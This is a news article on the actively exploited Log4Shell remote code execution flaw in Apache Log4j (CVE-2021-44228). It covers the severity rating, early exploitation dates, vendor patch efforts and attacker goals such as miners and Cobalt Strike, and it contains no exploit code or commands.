A newly discovered “Log4Shell” vulnerability in Log4j is being actively exploited. As per the information that is available, the threat actors are seeking to install cryptocurrency miners, Cobalt Strike, and add infected devices into a botnet.
Tracked as CVE-2021-44228, the vulnerability has CVSS score of 10.0, and concerns a remote code execution weakness in Apache Log4j, a widely used Java open-source logging framework, used for recording events and messages created by software applications.
The flaw has been ranked with the highest severity because, as per the details that have been revealed, anyone can take advantage of this vulnerability by sending a malicious Log4j version 2.0 or higher-logging string to a vulnerable server, which will then allow an to execute remote code on the vulnerable server and gain control.
According to the most recent information, the vulnerability has been exploited for at least a week before it was made public on December 10. A number of companies have confirmed that their services have been impacted, indicating that the vulnerability has spread to more manufacturers.
The earliest indication of the Log4j attack may be discovered on December 1, 2021, at 04:36:50 UTC, according to Cloudflare CEO Matthew Prince in a tweet published on Sunday. In an independent analysis, Cisco Talos said that it started detecting attacker behavior connected to the flaw on December 2nd.
Additionally, manufacturers have been forced to search for quick patch solutions in order to provide fixes for the problem. Virtualization tech giant VMware has warned of “exploitation attempts in the wild”, adding that it is rolling out updates to its products. SonicWall, a provider of network security, also has announced in an alert that its Email Security product is vulnerable and that it is trying to offer a solution while investigating the rest of its portfolio.
The majority of the attacks so far have been a result from mass scanning by attackers trying to discover vulnerable systems. Depending on the vulnerability, an attacker may perform a wide range of malicious tasks, once they have complete access and control. According to a report published by Microsoft, this includes installing Cobalt Strike, which enables credential theft, running cryptocurrency miners and exfiltrating data from the hacked workstations.
Unfortunately, there is no specific target for this flaw, and attackers are wreaking havoc on all vulnerable systems that they detect. This only indicates how incidents like this one, where a single vulnerability that has been discovered and incorporated in a lot of software, may have very serious effects, allowing for more attacks and exposing the systems that are impacted to a critical risk.